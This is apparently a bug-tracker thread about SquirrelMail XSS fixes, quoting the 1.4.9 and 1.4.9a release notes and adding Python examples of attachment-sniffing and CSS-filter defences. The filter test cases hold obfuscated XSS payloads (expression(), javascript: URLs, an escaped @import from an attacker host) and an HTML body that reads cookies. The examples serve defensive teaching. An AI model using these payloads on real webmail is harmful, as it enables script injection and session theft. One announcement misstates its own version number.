From: kink@squirrelmail.org
Subject: [SM-ANNOUNCE] SquirrelMail 1.4.9 Released
Date: December 2, 2006 10:48:45 AM EST
To: squirrelmail-announce@lists.sourceforge.net
Cc: squirrelmail-plugins@lists.sourceforge.net, squirrelmail-users@lists.sourceforge.net, squirrelmail-devel@lists.sourceforge.net

Hello All,

The SquirrelMail Project Team is proud to announce the release of SquirrelMail 1.4.7. This version is a maintenance release, addressing the following problems since 1.4.6:

- Some security fixes (see below)
- Small enhancements
- A collection of bugfixes (see ChangeLog)

Security issues
===============

This release addresses security issues found since the release of 1.4.8:

Cross site scripting via malicious input to the mailto parameter of webmail.php, the session and delete_draft parameters of compose.php and via a shortcoming in the magicHTML filter. This is CVE-2006-6142. Thanks to Martijn Brinkers for his continued research that uncovered these issues.

We've also changed SquirrelMail attachment handling to work around an issue in Internet Explorer: the browser will attempt to guess the MIME type of attachments based on content, not the MIME header we send. Attachments could pretend to be a 'harmless' image/jpeg, while they were in fact HTML that Internet Explorer would render.

Further details on SquirrelMail vulnerabilities can be found at the following address: http://www.squirrelmail.org/security/

We strongly encourage any persons uncovering security issues to contact the SquirrelMail team via security <at> squirrelmail.org.

Package md5sums
===============

b3dc6e3c5accb9b88bf6ebfd87336b96 squirrelmail-1.4.9.tar.bz2
5a3ecbda6d8378c68fa40b4ac5b2d487 squirrelmail-1.4.9.tar.gz
875848f25d481b59552d4e93aaacba4c squirrelmail-1.4.9.zip

Download at: http://www.squirrelmail.org/download.php

Happy SquirrelMailing!

--
Thijs Kinkhorst
SquirrelMail Project Team
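The attachment workaround in the announcement above is described only in outline (Internet Explorer sniffs content instead of trusting the Content-Type header, so an "image/jpeg" that is really HTML gets rendered). The following Python is an added illustration of the server-side check a webmail front end needs for that failure mode; it is not SquirrelMail's own PHP code and the project's actual change is not reproduced here. Assumptions: the 256-byte sniffing window and the tag list are an illustrative subset of what IE's sniffer looked at; the magic-byte table covers only three common image types; the X-Content-Type-Options: nosniff header is a later browser feature added for completeness, not something 2006-era IE honoured. The sample attachment bodies are constructed.

```python
import re

# IE examined roughly the first 256 bytes when guessing a type (assumed
# window; see lead-in). The tag list is an illustrative subset of the
# markup a sniffing browser treats as HTML.
SNIFF_WINDOW = 256
_HTML_MARKERS = re.compile(
    rb"<(?:!doctype\s+html|html|head|body|script|title|table|img|plaintext|a\s)",
    re.IGNORECASE,
)

# Magic bytes for image types a webmail client commonly displays inline.
_MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}

# Constructed sample attachments: one is HTML claiming to be a JPEG, the
# other starts with a genuine JFIF header.
FAKE_JPEG = b"<html><body><script>alert(document.cookie)</script></body></html>"
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32


def looks_like_html(data: bytes) -> bool:
    """True if the leading bytes contain markup a sniffing browser would render."""
    return _HTML_MARKERS.search(data[:SNIFF_WINDOW]) is not None


def magic_matches(declared: str, data: bytes) -> bool:
    """True if the declared image type is backed by the file's magic bytes."""
    return any(data.startswith(m) for m in _MAGIC.get(declared, ()))


def attachment_headers(declared: str, filename: str, data: bytes) -> dict:
    """Decide how an attachment is served.

    Inline display is allowed only for a known image type whose bytes really
    are that image and whose leading bytes carry no HTML markers. Anything
    else is served as an opaque download, so the declared MIME type from the
    message can never be used to smuggle HTML past the browser.
    """
    safe_name = re.sub(r"[^\w.\-]", "_", filename)  # keep CR/LF/quotes out of the header
    inline_ok = (
        declared in _MAGIC
        and magic_matches(declared, data)
        and not looks_like_html(data)
    )
    if inline_ok:
        return {
            "Content-Type": declared,
            "Content-Disposition": f'inline; filename="{safe_name}"',
            "X-Content-Type-Options": "nosniff",  # later-era header, see lead-in
        }
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    for name, body in (("photo.jpg", FAKE_JPEG), ("real.jpg", REAL_JPEG)):
        print(name, attachment_headers("image/jpeg", name, body))
```

The important design point is that the declared type is never trusted on its own: it is only used once the bytes corroborate it, and the fallback is a forced download rather than an attempt to pick a "better" inline type.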
Thanks for filing this. eraidcator, please provide new packages, blablaa (guess you already know that ;)
From: marc@squirrelmail.org
Subject: [SM-ANNOUNCE] SquirrelMail 1.4.9a Released
Date: December 3, 2006 8:25:21 PM EST
To: squirrelmail-announce@lists.sourceforge.net
Cc: squirrelmail-devel@lists.sourceforge.net, squirrelmail-users@lists.sourceforge.net, squirrelmail-plugins@lists.sourceforge.net

Hello All,

The SquirrelMail Project Team is proud to announce the release of SquirrelMail 1.4.9a. This version is a security release. The day after we released SquirrelMail 1.4.9 new cross site scripting issues were reported and immediately fixed. Therefore the decision to release 1.4.9a so shortly after the 1.4.9 release.

1.4.9 and 1.4.9a are addressing the following problems since 1.4.8:

- Some security fixes (see below)
- Small enhancements
- A collection of bugfixes (see ChangeLog)

Security issues
===============

This release addresses security issues found since the release of 1.4.8:

Cross site scripting via malicious input to the mailto parameter of webmail.php, the session and delete_draft parameters of compose.php and via a shortcoming in the magicHTML filter. This is CVE-2006-6142. Thanks to Martijn Brinkers for his continued research that uncovered these issues.

We've also changed SquirrelMail attachment handling to work around an issue in Internet Explorer: the browser will attempt to guess the MIME type of attachments based on content, not the MIME header we send. Attachments could pretend to be a 'harmless' image/jpeg, while they were in fact HTML that Internet Explorer would render.

After release 1.4.9 Martijn Brinkers again discovered new cross site scripting issues in the magicHtml filter. The newly discovered security issues have to do with the wide interpretation of the words expression and url by IE browsers. As a second issue, Martijn Brinkers discovered that the @import statement in stylesheets could be misused.

Further details on SquirrelMail vulnerabilities can be found at the following address: http://www.squirrelmail.org/security/

Package md5sums
===============

3adf66bfe2e816ba8375cf811d8ef3f6 squirrelmail-1.4.9a.tar.bz2
5b19f8cc5badef91d1f2410df41564bc squirrelmail-1.4.9a.tar.gz
a9e108418b0a42763a1d29a267fa7168 squirrelmail-1.4.9a.zip

Download at: http://www.squirrelmail.org/download.php

Happy SquirrelMailing!

--
Marc Groot Koerkamp
SquirrelMail Project Team
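The 1.4.9a announcement above says the new magicHTML bypasses came from IE's "wide interpretation" of expression and url, plus @import, without showing what that looseness looks like. The Python below is an added illustration of why a literal-string CSS filter fails against such a browser and what a normalising filter has to do first; it is not SquirrelMail's magicHTML code, and the specific bypass strings are constructed by the editor, not taken from Martijn Brinkers' reports. Assumptions: IE is treated as ignoring /* */ comments inside identifiers, decoding CSS backslash-hex escapes, ignoring case, and tolerating whitespace before the opening parenthesis; blocking every url( is a deliberately conservative choice.

```python
import re

# CSS escape: backslash + 1..6 hex digits + optional single whitespace,
# or backslash + any other character taken literally.
_ESCAPE = re.compile(r"\\(?:([0-9a-fA-F]{1,6})[ \t\r\n\f]?|(.))", re.S)

# Tokens that must not survive in normalised CSS. 'expression' is IE's
# script hook, '@import' pulls in remote stylesheets, and url( is blocked
# outright here rather than trying to vet its scheme (conservative choice).
_DANGEROUS = re.compile(r"expression|@import|url\s*\(")

# Constructed style-attribute values, mapped to whether a correct filter
# should allow them (True) or block them (False).
SAMPLES = {
    "color: red; font-family: Arial": True,                      # benign
    "width: expression(alert(1))": False,                        # textbook form
    "width: EXPRESSION(alert(1))": False,                        # case only
    "width: exp/**/ression(alert(1))": False,                    # comment in identifier
    "width: \\65 xpression(alert(1))": False,                    # hex escape for 'e'
    "background: url\n(javascript:alert(1))": False,             # newline before '('
    "background: u\\72l(javascript:alert(1))": False,            # escape inside 'url'
    "@imp\\6Frt 'http://attacker.invalid/evil.css';": False,     # escaped '@import'
}


def _decode_escape(m: re.Match) -> str:
    hexpart, literal = m.group(1), m.group(2)
    if hexpart is None:
        return literal
    cp = int(hexpart, 16)
    return "\ufffd" if cp == 0 or cp > 0x10FFFF else chr(cp)


def normalize_css(css: str) -> str:
    """Reduce CSS to the form a lenient browser effectively sees."""
    s = css.replace("\x00", "")                     # NULs are dropped by lenient parsers
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.S)     # comments, even mid-identifier
    s = _ESCAPE.sub(_decode_escape, s)              # \65 -> 'e', \72 -> 'r', ...
    s = s.lower()
    return re.sub(r"\s+", " ", s)


def naive_filter(css: str) -> bool:
    """Literal substring check of the kind that the bypasses defeat. True = allowed."""
    return not any(tok in css for tok in ("expression(", "url(", "@import"))


def hardened_filter(css: str) -> bool:
    """Normalise first, then match. True = allowed."""
    return _DANGEROUS.search(normalize_css(css)) is None


def misses(filter_fn) -> list:
    """Samples the filter gets wrong: payloads allowed or benign CSS blocked."""
    return [css for css, want in SAMPLES.items() if filter_fn(css) != want]


if __name__ == "__main__":
    for name, fn in (("naive", naive_filter), ("hardened", hardened_filter)):
        print(f"{name}: {len(misses(fn))} wrong decision(s)")
        for css in misses(fn):
            print("   let through:" if SAMPLES[css] is False else "   blocked:", repr(css))
```

The order of the normalisation steps matters: comments are removed before escapes are decoded so that an escaped slash stays a literal character, and case folding and whitespace collapsing come last so the final pattern match is a single, simple regular expression. Over-blocking (for example every url( value) is accepted as the price of not having to reason about every scheme the browser might honour.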
As Jeremy is still MIA, I took the liberty of bumping squirrelmail to 1.4.9a. I have also marked it stable on x86, as I only tested it on a stable box, where I have a working squirrelmail installation.
Arches, test and mark mail-client/squirrelmail-1.4.9a stable if possible please
x86 and sparc already done. Removing.
ppc stable
Stable on Alpha.
ppc64 stable
amd64 stable
I vote no
I'm actually the only active member of the security team, so let's close this without GLSA. Feel free to reopen if you disagree.
This was marked as closed but was never fixed for ~arch. 1.5.1-r4 contains the fix.